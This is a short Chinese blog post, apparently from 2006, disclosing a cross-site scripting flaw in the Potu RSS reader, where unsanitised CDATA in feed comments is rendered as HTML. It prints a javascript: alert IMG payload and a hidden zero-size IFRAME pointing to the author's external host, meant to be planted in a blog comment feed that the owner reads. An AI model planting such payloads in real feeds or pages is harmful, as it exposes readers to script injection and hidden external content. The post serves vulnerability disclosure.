potu周博通-资讯阅读器2.0(26060619)最新漏洞

周博通是目前最流行的免费RSS阅读器之一,界面友好,分类清晰,操作简单.内置新浪网、新华网、天极网、计世网等数百个RSS新闻源,不用打开网页就可第一时间阅读自己喜欢的新闻。

CDATA部件在XML里:

If your text contains a lot of "<" or "&" characters – as program code often does – the XML element can be defined as a CDATA section.
如果文本包含了很多的"<"字符和"&"字符——就象程序代码一样,那么最好把他们都放到CDATA部件中。
everything inside the CDATA section is ignored by the parser.所有在CDATA部件之间的文本都会被解析器忽略。

而potu却自作聪明,把代码转换成了html,然后再从他自带的浏览器中打开。

C:\Program Files\zhoubotong\RssReader\Common\temphtmlb.htm

看起来很方面,却忽略了一些安全因素。
比如这个CDATA,转换的时候,并没有做任何处理。导致了xss漏洞。

现在我在blog里回复了一条xss语句。(刚好师父的blog里面有这个语句大全,所以。。。)

因为本来订阅文章那里是用户订阅的。
http://promise.cnxhacker.com/blog/feed.asp

而文章那里的rss只能是师父可以编辑,我们能编辑只能是回复的rss。
http://promise.cnxhacker.com/blog/feed.asp?q=comment

刚好,这个回复的通常只有blog的主人会去浏览。

<IMG SRC="javascript:alert('hacked by kxlzx');">
如果成功攻击,会出现一个匡。

但是<IFRAME src="http://www.inbreak.net/kxlzx1.htm" frameBorder=0 width=0 height=0></IFRAME> 这个东西却不行,原因并不是potu的事情,而是该blog本身的防范,把这句自动转换成了

“ <IFRAME src="<a href="http://www.inbreak.net/kxlzx1.htm" title="http://www.inbreak.net/kxlzx1.htm" target="_blank">http://www.inbreak.net/kxlzx1.htm</a>" frameBorder=0 width=0 height=0></IFRAME>”

结果不能执行。
也就是说如果换个地方,也许会。。。

相关动画下载:

http://www.inbreak.net/blog/uploads/20060722/potuxss.rar

空虚浪子心[XGC]

中国X黑客小组技术部.
http://www.cnxhacker.com

相关日志

发表评论